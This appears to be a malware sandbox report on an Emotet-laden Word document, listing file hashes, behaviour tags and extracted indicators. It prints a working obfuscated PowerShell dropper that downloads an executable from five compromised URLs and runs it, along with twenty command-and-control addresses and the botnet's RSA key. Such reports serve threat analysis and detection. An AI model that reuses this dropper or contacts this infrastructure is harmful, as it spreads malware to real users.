
General

  • Target

    8d6151eb11f256ed1714c4e63b8647602522740d5b23a060bde1f703259cbe8e.doc

  • Size

    132KB

  • Sample

    200125-1tgg648jy2

  • MD5

    609a82dd7672ce7eaffff60004e68e51

  • SHA1

    417b7b59d41946571f5f744e9afa94f664829e53

  • SHA256

    8d6151eb11f256ed1714c4e63b8647602522740d5b23a060bde1f703259cbe8e

  • SHA512

    c683b40c6b62ff86ecc737f8e07a4c496aba9aa740bcce53ae4fd686242c4efeb9df5405c6c6f1a65ecccdd37fffcb0246860ab497bf342cc37d49e872b912fa

Malware Config

Extracted

Language
ps1
Source
$Kfsoqqwaj='Znqshocn';$Sidlaggzovm = '323';$Sjltowlwr='Tgbnrivgpj';$Uzrgggyl=$env:userprofile+'\'+$Sidlaggzovm+'.exe';$Lmpnsatzzeemi='Czpnxomukrtwu';$Wmsxkfflkl=.('ne'+'w-ob'+'ject') nEt.WebcLIeNT;$Tdftnhynub='http://relprosurgical.com/wordpress/erEIWTG/*http://compunetplus.com/lacrosseleaguestats/yJpumLt4l/*https://bbs.anyakeji.com/wp-admin/5MNyBTn4B/*http://rodyaevents.com/wp-content/t8v9c/*https://emerson-academy.2019.sites.air-rallies.org/wp-admin/h4u1/'."s`PliT"([char]42);$Mxzkahyj='Ypnocofolsgav';foreach($Rzanwtuclk in $Tdftnhynub){try{$Wmsxkfflkl."D`oWn`LOADfI`Le"($Rzanwtuclk, $Uzrgggyl);$Ysfwzdzgxs='Ycpeqwqyzzg';If ((&('G'+'et'+'-Item') $Uzrgggyl)."LENg`Th" -ge 26254) {[Diagnostics.Process]::"S`TaRT"($Uzrgggyl);$Hiaumbdzbpt='Szjqvvaglvoq';break;$Wlzlxtkwq='Gekybakd'}}catch{}}$Zpikmchvnleiw='Bdvtjwjdnor'
URLs
exe.dropper

http://relprosurgical.com/wordpress/erEIWTG/

exe.dropper

http://compunetplus.com/lacrosseleaguestats/yJpumLt4l/

exe.dropper

https://bbs.anyakeji.com/wp-admin/5MNyBTn4B/

exe.dropper

http://rodyaevents.com/wp-content/t8v9c/

exe.dropper

https://emerson-academy.2019.sites.air-rallies.org/wp-admin/h4u1/

Extracted

Family

emotet

Botnet

Epoch2

C2

70.180.35.211:80

74.108.124.180:80

85.105.205.77:8080

23.92.16.164:8080

45.55.65.123:8080

217.160.19.232:8080

176.9.43.37:8080

59.103.164.174:80

70.184.9.39:8080

202.175.121.202:8090

62.75.187.192:8080

217.160.182.191:8080

201.184.105.242:443

78.142.114.69:80

159.65.25.128:8080

104.236.246.93:8080

152.168.248.128:443

24.105.202.216:443

121.88.5.176:443

92.222.216.44:8080

rsa_pubkey.plain
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAKl4M80uy0jcxUiFIaJJyxgHVVnFtCq6
bi6f2xXPh/XUZNyN8UXDe5HzhTc4kwon9MBZffNwFOIc61QfV3K3YzEI/ktcyNqK
LS67ONxsVep769QdiVQJXrIaFjMXKz6viwIDAQAB
-----END PUBLIC KEY-----

Targets

    • Target

      8d6151eb11f256ed1714c4e63b8647602522740d5b23a060bde1f703259cbe8e.doc

    • Size

      132KB

    • MD5

      609a82dd7672ce7eaffff60004e68e51

    • SHA1

      417b7b59d41946571f5f744e9afa94f664829e53

    • SHA256

      8d6151eb11f256ed1714c4e63b8647602522740d5b23a060bde1f703259cbe8e

    • SHA512

      c683b40c6b62ff86ecc737f8e07a4c496aba9aa740bcce53ae4fd686242c4efeb9df5405c6c6f1a65ecccdd37fffcb0246860ab497bf342cc37d49e872b912fa

    Score
    10/10
    • Emotet

      Emotet is a trojan that is primarily spread through spam emails.

    • Process spawned unexpected child process

    • Executes dropped EXE

MITRE ATT&CK Enterprise v6
